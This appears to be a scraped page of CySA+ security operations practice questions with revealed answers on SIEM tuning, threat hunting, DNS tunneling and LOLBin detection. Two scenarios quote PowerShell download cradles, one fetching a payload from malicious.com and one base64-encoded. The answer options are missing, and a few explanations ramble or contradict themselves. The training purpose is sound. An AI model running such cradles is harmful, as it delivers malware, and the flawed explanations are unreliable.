During a network traffic review, an analyst notices encrypted traffic to an unusual external IP address on TCP port 53. What is the most likely anomaly this indicates?
75 of 165 questions · Page 1/3 · Cysa Security Operations topic · Answers revealed
During a network traffic review, an analyst notices encrypted traffic to an unusual external IP address on TCP port 53. What is the most likely anomaly this indicates?
An analyst is triaging a SIEM alert that fires when a single host makes more than 100 outbound connections to unique IPs within one minute. The analyst finds that the host is a web server responding to legitimate client requests. What is the best action to reduce false positives?
A higher threshold accommodates legitimate traffic.
Why this answer
Adjusting the threshold to a higher number that accounts for normal web server traffic will reduce false positives while still detecting scanning behavior.
A security analyst is configuring a SIEM correlation rule to detect potential brute-force attacks. Which log source combination is most appropriate for this rule?
Authentication logs provide the login events, and firewall logs provide the source IPs to correlate and identify brute-force sources.
An organization wants to detect threats in their AWS environment using a cloud-native service that monitors for suspicious API calls and potential credential compromise. Which service should they use?
Correct. GuardDuty is a threat detection service.
Why this answer
AWS GuardDuty is a threat detection service that monitors for malicious activity, including suspicious API calls and credential compromise.
A threat hunter notices that a legitimate Windows binary 'rundll32.exe' is executing with network connections to an external IP address. The parent process is 'winword.exe'. Which LOLBin technique is most likely being used?
Correct. Rundll32 is used to load DLLs, and winword.exe as parent suggests malicious macro.
Why this answer
Rundll32.exe is a known LOLBin that can be used to execute DLLs. When spawned from winword.exe, it often indicates a macro-based attack loading a remote payload.
An analyst is using AWS GuardDuty and sees a finding that an EC2 instance is communicating with a known command-and-control (C2) IP address. What type of alert is this?
GuardDuty uses threat intelligence to identify C2 communication.
Why this answer
GuardDuty detects threats based on known malicious IPs, so communication with a C2 IP is a security finding indicating a potential compromise.
A security analyst is investigating an alert from Azure Sentinel that indicates a user account has logged in from a geographically improbable location. The analyst needs to determine if this is a true positive. Which TWO additional data sources should the analyst examine? (Choose TWO.)
Correct. They provide details of the login event.
Why this answer
Authentication logs show the source IP and timestamp, and threat intelligence can reveal if the IP is known malicious. Device compliance may be irrelevant, and VPN logs could explain the location.
A security analyst is tuning a SIEM rule that generates alerts for every failed login attempt. The rule is causing alert fatigue. Which TWO actions would reduce false positives while maintaining security visibility?
This groups multiple attempts into one alert, reducing noise.
Why this answer
Aggregating alerts by source IP reduces noise from individual attempts. Whitelisting known service accounts performing repeated failed logins (due to misconfigured services) also reduces false positives.
A SOC analyst is investigating an alert from AWS GuardDuty that indicates 'UnauthorizedAccess:EC2/SSHBruteForce'. The analyst reviews CloudTrail logs and sees multiple failed SSH login attempts from a single IP address. What initial triage action should the analyst take?
Blocking the source IP stops the attack without disrupting legitimate traffic.
Why this answer
The best initial action is to block the source IP address at the security group or network ACL to stop the brute force attack, then investigate further.
Which of the following is a primary benefit of using credentialed vulnerability scans over non-credentialed scans?
Credentialed scans can verify patch levels and settings.
Why this answer
Credentialed scans can access the OS and applications, allowing deeper inspection of installed software, patches, and configuration settings.
A security analyst is reviewing SIEM alerts and notices a high volume of alerts for a specific event ID that has been determined to be benign. Which action should the analyst take to reduce noise?
Suppressing known false positives reduces noise.
Why this answer
True positive alerts are genuine threats; false positives are benign. Tuning the SIEM to suppress known false positives reduces alert fatigue.
During a network traffic analysis, a security analyst observes repeated connections from an internal host to a known malicious IP on port 4444. The payload appears to be encrypted. Which type of activity is most likely indicated?
Correct. This matches C2 behavior.
Why this answer
Repeated connections to a known malicious IP on a non-standard port with encrypted payloads strongly suggest command and control (C2) beaconing.
An analyst is investigating a host that communicates with a domain using a DGA-like algorithm. The domain name appears random and resolves to different IPs over time. Which threat-hunting technique would best identify the DGA pattern?
Correct. DNS log analysis can reveal DGA patterns via high-entropy domains.
Why this answer
DGA domains can be detected by analyzing DNS query patterns for algorithmic generation, often using frequency analysis or ML models.
During a threat hunting exercise, an analyst uses osquery to query process events on endpoints. They discover a process named 'svchost.exe' running under a user account with parent process 'cmd.exe'. Which of the following describes this observation?
Attackers often use svchost.exe as a LOLBin, and the unusual parent cmd.exe suggests malicious activity.
Why this answer
svchost.exe should normally run under SYSTEM or NETWORK SERVICE with 'services.exe' as parent. A user-level svchost.exe with cmd.exe parent indicates a potential LOLBin misuse.
A security analyst is creating a YARA rule to detect a specific malware strain that uses a unique string in its code section and has a characteristic import table. The analyst wants to minimize false positives. Which THREE YARA rule elements should the analyst include?
Limiting file size helps avoid matching unrelated files of different sizes.
Why this answer
Including file size limits, a specific string, and the import table condition reduces false positives by narrowing the scope.
A security analyst is hunting for signs of lateral movement in the network. Which THREE indicators are most consistent with lateral movement techniques?
RDP from a domain controller to a workstation is unusual and may indicate lateral movement.
Why this answer
Lateral movement often involves remote execution tools (PsExec), remote service creation, and suspicious RDP connections.
A SOC analyst is triaging a SIEM alert that indicates a possible DNS tunneling attack. The alert was generated based on a correlation rule that looks for unusually high DNS query volume from a single host. Which TWO additional data sources should the analyst correlate to confirm the attack?
DNS logs contain queried domain names and response sizes, useful for detecting tunneling.
Why this answer
DNS logs can show query patterns and payload sizes. NetFlow can show data transfer volumes. Both help confirm tunneling.
A threat intelligence report indicates that a known APT group is using 'regsvr32.exe' to execute malicious code. Which detection rule type would be most effective in identifying this technique across multiple endpoints?
Sigma rules provide a generic signature format for log events, ideal for detecting regsvr32 usage in process creation logs.
Why this answer
Sigma rules are designed for log detection across SIEMs, making them suitable for detecting specific command-line patterns like regsvr32 execution.
A security analyst is reviewing an alert from a CASB that shows a user downloading a large volume of sensitive data from a cloud storage application to a personal device outside of business hours. The user's behavior is atypical. Which of the following is the most likely interpretation?
Correct. Unusual download volume and time suggest an attacker exfiltrating data.
Why this answer
Atypical data download from a cloud service to a personal device outside business hours is a strong indicator of data exfiltration.
An analyst is reviewing a CASB alert indicating that a user accessed a cloud application from a geolocation that is not typical for the organization. Which THREE additional data sources would be most helpful to determine if the activity is malicious?
They show what actions the user performed, helping to identify anomalous behavior.
Why this answer
Authentication logs show if the login was successful and from which IP; threat intel can identify if the IP is malicious; user activity logs show behavior patterns.
A security analyst is reviewing a CASB alert indicating a user is accessing a cloud storage application from an unusual location. The analyst needs to investigate further. Which TWO actions are most appropriate?
Audit logs show what actions were taken, helping determine if data was exfiltrated.
Why this answer
Checking the user's recent authentication logs can confirm if the access was legitimate. Reviewing the cloud application's audit logs can provide details on the activities performed. The other options are less relevant or too broad.
During a threat hunting exercise, an analyst creates a hypothesis that a threat actor may be using scheduled tasks for persistence. Which Windows registry key or log source should the analyst examine to confirm the hypothesis?
Event ID 4698 logs when a scheduled task is created, providing evidence of persistence.
Why this answer
Scheduled tasks are stored in the Windows Task Scheduler and can be viewed via schtasks.exe, but the registry also contains persistence mechanisms. However, scheduled tasks are not primarily stored in the registry; they are in %SystemRoot%\Tasks. Alternatively, the analyst can use the Task Scheduler API.
But among the options, examining the 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule' is not standard. Actually, the correct answer is to examine the Task Scheduler logs or the tasks folder. However, the question specifies registry key or log source.
The best answer is to review the Windows Security Event Log for event ID 4698 (scheduled task creation).
A security analyst notices a high number of alerts from a new detection rule that triggers on 'any outbound connection to a known malicious IP'. After investigation, the analyst finds that the IP address is from a threat intelligence feed but the connections are actually from a legitimate security scanner that was recently deployed. How should the analyst handle this?
Allowlisting legitimate sources reduces false positives while maintaining detection.
Why this answer
The alerts are false positives because the traffic is legitimate. The analyst should tune the rule to exclude the scanner's source IP addresses.
A threat hunter is analyzing EDR telemetry and discovers that the process svchost.exe spawned a child process powershell.exe. The powershell.exe then established a network connection to an external IP address. Which of the following best describes this behavior in the context of threat hunting?
Attackers use LOLBins like PowerShell to blend in; svchost as parent is unusual and indicates potential abuse.
Why this answer
Svchost.exe is a legitimate Windows process, but it should not spawn PowerShell. This is an unusual parent-child relationship often indicative of lateral movement or code injection, where attackers use svchost to execute malicious code.
A security engineer is configuring a new SIEM correlation rule to detect lateral movement. Which of the following log sources would provide the most relevant data for detecting pass-the-hash attacks?
Authentication logs record logon attempts and can reveal pass-the-hash indicators.
Why this answer
Authentication logs (e.g., Windows Security Event ID 4624) contain details about logon types (e.g., Network logon) and account names, which are crucial for detecting pass-the-hash.
A security analyst is configuring a vulnerability scanner for internal infrastructure. Management wants to minimize disruption to critical systems while ensuring accurate results. Which scan configuration should the analyst recommend?
Agent-based scans reduce network load and off-peak hours minimize disruption.
Why this answer
Credentialed scans provide more accurate results by accessing the system deeply, but they can cause load. Agent-based scans reduce network load and allow scheduling, minimizing disruption.
An analyst is tasked with creating a correlation rule in the SIEM to detect beaconing activity. Which log sources and fields are most relevant to model this behavior?
Correct. Beaconing is detected by analyzing connection frequency and regularity in firewall logs.
Why this answer
Beaconing involves periodic outbound connections, so firewall logs (source IP, destination IP, destination port) and connection timestamps are essential for detecting regularity.
An analyst needs to capture network traffic on a Linux server to investigate a potential data exfiltration. Which command-line tool is best suited for real-time packet capture and analysis?
tcpdump is the standard CLI tool for packet capture on Linux.
Why this answer
tcpdump is a powerful command-line packet analyzer for Linux, capable of capturing network traffic in real time and saving it for later analysis.
A security analyst is investigating a series of alerts from AWS GuardDuty indicating 'UnauthorizedAccess:EC2/SSHBruteForce'. The affected EC2 instance has a high CPU load. The analyst checks the security group rules and finds that SSH (port 22) is open to 0.0.0.0/0. What is the best immediate remediation action?
This reduces exposure while maintaining necessary access.
Why this answer
The instance is exposed to the internet on SSH. Restricting SSH access to known IP addresses reduces the attack surface. Creating a new security group with a narrow source range and applying it stops brute force attempts.
During a threat hunt, an analyst notices repeated DNS queries for random-looking subdomains under a legitimate domain. The domains have high entropy and never existed before. What technique is most likely being used?
Random high-entropy subdomains are characteristic of DGA.
Why this answer
Domain Generation Algorithms (DGAs) generate many random domain names to evade blocklists. C2 malware often uses DGAs.
A vulnerability scan report shows a critical vulnerability with a CVSS score of 9.8 on a web server. However, the server is only accessible from internal IP addresses and is protected by a Web Application Firewall (WAF) that blocks the attack vector. Which of the following should the analyst recommend?
The WAF mitigates the vulnerability, so risk acceptance is appropriate with documentation.
Why this answer
Compensating controls like a WAF that effectively blocks the attack reduce the risk. While patching is ideal, the vulnerability may not be immediately exploitable due to the WAF.
A threat hunter is using Velociraptor to search for signs of lateral movement across multiple endpoints. The hunter wants to identify instances where a user logged into multiple systems using the same credentials within a short time frame. Which THREE artifacts should the hunter collect from each endpoint?
Active network connections can indicate remote access tools.
Why this answer
Security Event Logs (Event ID 4624) show logon sessions, network connections show remote access, and WMI Activity logs can indicate lateral movement via WMI.
A threat hunter is analyzing network traffic and observes a system making outbound connections to multiple IP addresses on port 53 (DNS) with unusually large payload sizes. The hunter suspects DNS tunneling. Which THREE characteristics are indicative of DNS tunneling?
Typical DNS queries are small; large payloads suggest data encoding.
Why this answer
DNS tunneling often involves large payloads, high query volume to a single domain, and non-standard record types to encode data.
A security analyst is investigating a potential DNS tunneling attack. Which of the following patterns in DNS logs would most likely indicate such activity?
Long subdomains with high frequency are classic tunneling indicators.
Why this answer
DNS tunneling encodes data in subdomains, resulting in long, random-looking domain names with high query volumes to a specific domain.
A vulnerability scan report shows a critical vulnerability on a web server. The server is behind a WAF that blocks the relevant exploit payloads. According to the organization's risk management policy, what should the analyst do?
When a compensating control is effective, risk acceptance is appropriate.
Why this answer
Compensating controls like a WAF can justify accepting the risk rather than immediately patching if it would cause downtime.
A security team is reviewing cloud audit logs from AWS CloudTrail and notices repeated API calls to create EC2 instances in a region where the organization has no presence. What is the most likely cause?
Attackers often use compromised keys to spin up resources for cryptomining.
Why this answer
Unauthorized API calls to create resources in unusual regions often indicate compromised credentials or an attacker using the account for cryptomining.
An analyst is investigating an EDR alert showing that 'powershell.exe' was launched by 'winword.exe' with the command: 'powershell -Command Invoke-WebRequest -Uri http://malicious.com/payload.ps1 -OutFile C:\Users\Public\payload.ps1'. Which LOLBin technique is being observed?
PowerShell is used to download and save a payload, a common LOLBin technique.
Why this answer
The attack chain involves a Microsoft Office document (winword.exe) launching PowerShell to download a payload. This is a classic LOLBin technique using PowerShell for code execution and download cradles.
A security analyst is reviewing a NetFlow record that shows a large amount of data being transferred from an internal server to an external IP address on port 443 during non-business hours. Which type of activity should the analyst suspect?
Unusual outbound data transfer on encrypted channel is a classic exfiltration indicator.
Why this answer
Large data transfers to an external IP on an encrypted channel (HTTPS) during off-hours is a common indicator of data exfiltration.
Which of the following is a persistence mechanism that involves modifying the Windows Registry to execute a program when a user logs in?
Run keys in Registry execute programs at logon.
Why this answer
The 'Run' registry key is commonly used to launch programs automatically at user logon, making it a persistence mechanism.
A SOC analyst receives an alert from the SIEM indicating a high volume of outbound traffic from a single workstation to an IP address in a country where the organization does no business. The alert is based on a rule that triggers when outbound traffic exceeds 1 GB in 5 minutes. Upon investigation, the analyst finds that the workstation is used by a developer who downloaded a large dataset from a cloud storage service. Which action should the analyst take to improve the alert's accuracy without disabling it entirely?
Whitelisting legitimate IPs reduces false positives while maintaining detection for other IPs.
Why this answer
The alert is a false positive because legitimate activity triggered it. The best approach is to tune the rule to exclude known cloud storage IP addresses or increase the threshold to reduce noise while still detecting true exfiltration.
A security analyst is tuning a SIEM rule that triggers on any process creation event involving 'rundll32.exe'. The rule generates many false positives from legitimate software updates. Which tuning action would most effectively reduce false positives while maintaining detection of malicious use?
Excluding known legitimate activity reduces false positives while keeping the rule active.
Why this answer
Creating an exception list for known legitimate processes or command lines that use rundll32.exe reduces false positives. However, the best approach is to modify the rule to include specific conditions such as parent process or command-line arguments that indicate malicious activity.
A security analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address on port 4444. The analyst checks the VPC Flow Logs and confirms the traffic. Which of the following is the most appropriate immediate action?
Correct. Isolation stops traffic while preserving the instance for investigation.
Why this answer
Isolating the EC2 instance by applying a restrictive security group stops the malicious communication and allows further investigation.
Correct. Large DNS queries with random subdomains to a fixed IP are indicative of DNS tunneling.
Why this answer
DNS tunneling uses the DNS protocol to exfiltrate data by encoding it in DNS queries, often with random-looking subdomains.
During a threat hunt, an analyst uses Velociraptor to collect forensic artifacts from endpoints. Which THREE of the following artifacts are most useful for detecting persistence mechanisms?
Attackers often create scheduled tasks for persistence.
Why this answer
Scheduled tasks, registry Run keys, and service configurations are common persistence locations monitored by attackers.
During a cloud security investigation, an analyst notices that an AWS IAM user generated multiple 'CreateKeyPair' API calls from an IP address outside the corporate network. Which AWS service is best suited to detect this type of anomalous behavior?
GuardDuty is designed to detect suspicious API activity.
Why this answer
AWS GuardDuty uses machine learning and threat intelligence to detect anomalous API activity, including unauthorized key creation, via CloudTrail logs.
A threat hunter is reviewing endpoint telemetry and sees a process 'svchost.exe' spawning 'cmd.exe', which then executes 'reg.exe add' to create a Run key. The hunter suspects persistence. Which TWO artifacts should the hunter examine to confirm persistence?
The command explicitly adds a Run key, so checking the registry is necessary.
Why this answer
Run keys are stored in the registry, and scheduled tasks can also be created via command line. Examining these confirms persistence.
An EDR agent reports that the process 'svchost.exe' spawned 'powershell.exe' with the command line: 'powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQAwAC8AcABhAHkAbABvAGEAZAAuAGUAeABlACcAKQA='. Which of the following is the most appropriate classification for this activity?
Correct. PowerShell is a LOLBin used for execution, and svchost.exe as parent is abnormal.
Why this answer
The encoded command decodes to 'IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.10/payload.exe')', which is a download cradle. Svchost.exe spawning PowerShell with such a command is highly suspicious and indicative of a true positive.
A SOC team is evaluating cloud-native security monitoring tools. Which TWO of the following are AWS services specifically designed for threat detection and security monitoring?
GuardDuty continuously monitors for malicious activity.
Why this answer
AWS GuardDuty is a threat detection service, and Security Hub aggregates security findings. Other services like CloudTrail are for logging, not primarily detection.
An analyst is reviewing NetFlow data and notices a large amount of data being transferred from an internal database server to an external IP address on port 443 during non-business hours. The database server is not expected to initiate outbound connections. Which type of activity is most likely occurring?
The characteristics match data being stolen.
Why this answer
The data transfer is large, to an external IP, on an encrypted port, outside business hours, and from a server that shouldn't initiate outbound connections. This strongly suggests data exfiltration.
An analyst is creating a detection rule for lateral movement using SMB. Which two network indicators should be included in the rule? (Choose two.)
Lateral movement often involves SMB between workstations, not just server-to-client.
Why this answer
Lateral movement over SMB often involves file writes to admin shares (IPC$) and unusual SMB traffic patterns.
During a vulnerability scan of internal hosts, a security analyst finds a critical vulnerability with a CVSS score of 9.8. The affected system is a legacy application that cannot be patched immediately. What should the analyst do next?
Compensating controls reduce risk while awaiting a permanent fix.
Why this answer
The analyst should document the finding and apply compensating controls, such as network segmentation or firewall rules, to mitigate risk until a patch can be applied.
A YARA rule is created to detect a specific malware family. The rule uses the string "MZ" at offset 0 and the string "malware" somewhere in the file. The analyst finds that many legitimate executables trigger the rule. What is the most effective way to reduce false positives?
Correct. Adding constraints like size or entry point reduces false positives.
Why this answer
Adding conditions like file size or entry point constraints narrows the rule to specific malware characteristics, reducing false positives from benign files.
An analyst is tuning a SIEM rule that triggers on failed logins. Which TWO modifications would most effectively reduce false positives without missing actual brute-force attacks? (Select TWO.)
Correct. External source IPs are more likely to be attackers; internal failures may be benign.
Why this answer
Limiting to remote logins reduces false positives from local console failures. Adding a threshold (e.g., >5) ensures only excessive failures alert, reducing noise from single failures.
A SIEM alert is generated for a user who logged into a workstation at 2:00 AM, which is outside their normal working hours. The user's manager confirms the user was on call and had legitimate reason to log in. How should the analyst classify this alert?
Correct. The alert is triggered on benign activity.
Why this answer
The alert is a false positive because the activity is legitimate despite being outside normal hours.
Which log source would best help detect an attacker using a domain generation algorithm (DGA) to communicate with a command and control server?
DNS logs contain the domains being queried, enabling detection of DGA patterns.
Why this answer
DGA generates many random domain names, which are often visible in DNS query logs. Analysing DNS logs for high volumes of NXDOMAIN responses or unusual domain patterns can indicate DGA activity.
During an incident response, an analyst identifies suspicious registry modifications in the 'Run' key and a scheduled task that executes a script. Which three persistence mechanisms are most likely being used? (Choose three.)
Services can be created to run malicious code automatically.
Why this answer
Run keys, scheduled tasks, and services are common persistence mechanisms. Startup folders are also common but not listed as a separate option here.
During a threat hunting engagement, a hunter creates a hypothesis that adversaries may be using PowerShell to perform reconnaissance via Active Directory cmdlets. The hunter decides to look for events where PowerShell loaded the ActiveDirectory module. Which of the following detection techniques is most appropriate?
Correct. Event ID 4104 logs PowerShell script blocks and can indicate module loading.
Why this answer
Sigma rules are designed for log-based detection and can be used to detect module loading events across multiple log sources.
An analyst is reviewing logs from multiple sources and sees that a user logged into a workstation at 8:00 AM, then the same user logged into a server in a different building at 8:01 AM. The authentication logs show the same source IP for both logins. What should the analyst suspect?
The attacker likely used harvested credentials from the workstation to authenticate to the server.
Why this answer
It's physically impossible to travel between buildings in one minute. The same source IP suggests a possible pass-the-hash or credential relay attack from the workstation to the server.
A vulnerability scan of an internal web server shows a critical vulnerability with a CVSS score of 9.8. The server is behind a WAF and is only accessible from internal IPs. Which of the following is the best next step?
WAF and network segmentation reduce risk; a risk assessment determines the urgency.
Why this answer
CVSS score reflects severity but not exploitability in the specific environment. Considering compensating controls (WAF, network ACLs) may reduce risk, so a risk assessment is needed before patching.
A security analyst is investigating a potential data exfiltration incident. They notice a host sending large amounts of data to an external IP address using DNS queries. Which technique is most likely being used?
DNS tunneling uses DNS protocol to exfiltrate data.
Why this answer
DNS tunneling encodes data in DNS queries and responses, allowing exfiltration over port 53, which is often allowed through firewalls.
During a threat hunt, an analyst identifies a suspicious process that is making outbound connections to multiple IP addresses on port 443 using TLS. The analyst suspects data exfiltration. Which THREE techniques would best help confirm this hypothesis?
Correlation of file access with network connections strengthens exfiltration evidence.
Why this answer
Analysing NetFlow/IPFIX data can reveal volume patterns indicative of exfiltration. Inspecting the TLS certificate or handshake can identify if it's a legitimate service. Checking EDR for file access events can show if sensitive files were read before the connections.
The other options are less direct.
A threat hunter is creating a hypothesis based on recent threat intelligence about a new ransomware variant that uses scheduled tasks for persistence. Which of the following MITRE ATT&CK techniques should the hunter focus on?
This technique covers persistence via scheduled tasks.
Why this answer
Scheduled tasks are a persistence technique (T1053.005) in the MITRE ATT&CK framework. The hunter should look for unusual scheduled tasks.
A security analyst is investigating a potential data exfiltration incident. Network traffic analysis shows large outbound data transfers to an external IP address on port 443. The analyst wants to determine if the data was encrypted. Which THREE tools or techniques should the analyst use?
Wireshark can decode packets and show if traffic is encrypted (e.g., TLS).
Why this answer
Wireshark can capture and analyze packets, NetFlow provides flow-level metadata, and examining TLS handshake can determine encryption.
An analyst is investigating a potential memory injection attack on a Windows system. Which of the following memory analysis artifacts is most indicative of code injection?
RWX memory regions are often used to host injected shellcode.
Why this answer
A process that is executing in a region of memory that is both writable and executable (RWX) is a strong indicator of injected code, as legitimate processes typically have separate write and execute permissions.
A security team is configuring a vulnerability scanner for external scanning of their public-facing web applications. Which scan type will provide the most accurate assessment of vulnerabilities without requiring credentials?
Correct. External scans simulate an attacker and do not require credentials.
Why this answer
An external scan assesses the attack surface from the internet perspective, typically without credentials. Agent-based and authenticated scans require credentials or internal access.
A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from an internal IP address. The username used does not exist in Active Directory. The analyst checks the source IP and finds it belongs to a known vulnerability scanner. What classification should the analyst assign to this alert?
Correct. The alert is triggered by authorized scanning activity, so it is a false positive.
Why this answer
The alert was triggered by a known vulnerability scanner attempting to enumerate usernames. This is expected behavior and not malicious, so it is a false positive.
During a threat hunt, an analyst uses osquery to query endpoints for processes that have spawned from Microsoft Word but have network connections. Which of the following TTPs does this technique most likely detect?
Macro-enabled documents can spawn suspicious child processes.
Why this answer
Attackers often use macro-enabled documents to execute code, making Word spawn abnormal child processes like PowerShell or cmd.exe, which then connect outbound.
During a threat hunting exercise, a hunter creates a hypothesis that a threat actor is using PowerShell to download payloads from a remote server. Which ATT&CK technique is the hunter most likely investigating?
Ingress Tool Transfer describes the act of downloading tools or payloads from a remote server.
Why this answer
This matches the ATT&CK technique T1059.001 (PowerShell) and T1105 (Ingress Tool Transfer). The hypothesis specifically focuses on downloading payloads, so Ingress Tool Transfer is the primary technique.
During a network traffic analysis, a security analyst notices a high volume of DNS queries to a domain that is algorithmically generated. The domain names follow a random pattern and are not resolved to known IP addresses. Which technique is most likely being used?
DGAs produce random domain names to communicate with C2 servers.
Why this answer
Domain Generation Algorithms (DGAs) are commonly used by malware to generate a large number of potential C2 domain names to evade static blocklists.
During a threat hunt, an analyst queries osquery to find processes where the 'cmdline' contains ' -e ' and the parent process is not 'explorer.exe'. This query is designed to detect which technique?
The query looks for encoded PowerShell commands (-e) spawned from non-standard parents, a common malicious pattern.
Why this answer
PowerShell with -e (encoded command) is often used for obfuscation; unusual parent processes suggest malicious execution.
A security analyst is investigating an alert from an endpoint EDR that shows a process with a parent-child relationship where the parent is Microsoft Word and the child process is wscript.exe executing a command to download a PowerShell script. Which MITRE ATT&CK technique does this likely represent?
Phishing via malicious document leading to execution of a script.
Why this answer
Phishing often delivers malicious documents. Word spawning wscript.exe to download a script is a classic phishing payload delivery, sub-technique T1566.001.
A threat hunter analyzes NetFlow data and observes a host communicating with multiple external IP addresses on high-numbered ports (e.g., 49300-49500) during off-hours. The communications are short-lived and occur in burst patterns. The hunter suspects data exfiltration. Which of the following analysis techniques would best confirm or refute this suspicion?
Correct. Packet capture reveals the actual data being transmitted.
Why this answer
Full packet capture allows deep inspection of payloads to identify if data is being exfiltrated, as NetFlow only provides metadata.
A security analyst is configuring a vulnerability scanner for an internal network. Which two settings are most important for reducing false positives during the scan? (Choose two.)
Disabling irrelevant plug-ins avoids false positives from unrelated checks.
Why this answer
Credentialed scans access system details for accurate results, and appropriate plug-in selection reduces irrelevant checks.
During a memory analysis of a compromised host, an analyst finds that 'svchost.exe' is running from 'C:\Users\Public\svchost.exe' instead of 'C:\Windows\System32\svchost.exe'. The process has injected code into a legitimate 'explorer.exe' process. What technique is being observed?
The attacker replaced the legitimate svchost with a malicious one and injected code into explorer.exe.
Why this answer
Running a system binary from a user-writable location is a common masquerading technique, and the code injection into explorer.exe indicates process hollowing or injection.
A security analyst is performing a vulnerability scan on an internal network. The analyst wants to ensure the scanner can identify vulnerabilities in applications that require authentication. Which TWO scan configurations should be used?
Agent-based scans run on endpoints and can perform authenticated checks with local privileges.
Why this answer
Credentialed scans allow the scanner to authenticate to systems and perform deeper checks, while authenticated scans (agent-based) can also provide access.
Ready to test yourself?
Try a timed practice session using only Cysa Security Operations questions.